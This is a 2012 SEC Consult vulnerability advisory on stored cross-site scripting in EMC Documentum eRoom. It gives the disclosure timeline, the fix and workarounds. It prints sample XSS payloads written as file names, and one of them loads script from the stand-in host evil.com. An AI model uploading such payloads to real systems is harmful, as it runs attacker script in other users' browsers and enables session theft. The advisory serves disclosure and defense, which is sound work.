title: Multiple permanent cross-site scripting vulnerabilities product: EMC Documentum eRoom
vulnerable version: 7.33.498.98 fixed version: 7.4.4 impact: high homepage: http://www.emc.com/products/detail/software2/eroom.htm found: 2011-05-05 by: F. Lukavsky, B. Schildendorfer SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
"EMC Documentum eRoom is easy-to-use online team collaboration software that enables distributed teams to work together more efficiently. With Documentum eRoom, teams around the world can accelerate document collaboration and group activities, improve the development and delivery of products and services, optimize collaborative business processes, improve innovation, and streamline decision-making."
There are many parameters which are not properly sanitized and thus vulnerable to XSS.
1) Permanent Cross-Site Scripting within file names The extension of files uploaded to Documentum eRoom are not sanitized. The following file name would lead to execution of script code as soon as the file is viewed (i.e. in the search results or the directory view)
file."><script>alert(1)</script> "><script src="http://evil.com/evil%2ejs"></script> "><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>
Documentum eRoom version 7.33.498.98
2011-11-22: Contacting vendor through firstname.lastname@example.org 2011-11-23: Vendor response, issue is being forwarded to the appropriate product development team for review and confirmation 2011-11-28: Vendor response, issue has been reviewed affected version is not supported anymore current version not affected by #1 and #3 additional information required for #2 and #4 2011-11-29: Providing additional information for #2 and #4 2011-11-30: Vendor cannot reproduce #2 and #4, asks for additional information 2012-01-12: Call with vendor to clarify remaining issues. 2012-01-27: Vendor requests additional information regarding the test environment in order to reproduce vulnerabilities #2 and #4 2012-03-13: EMC releases patch 2012-03-15: Public release of SEC Consult advisory
According to the vendor, these issues have been fixed in version 7.4.4 of Documentum eRoom. Upgrade to the new release.
Restrict access to the software as much as possible. Only allow trusted IP addresses and users in order to minimise attack surface. Do not host confidential information in Documentum eRoom.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH
Office Vienna Mooslackengasse 17 A-1190 Vienna Austria
Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com
EOF F. Lukavsky / @2012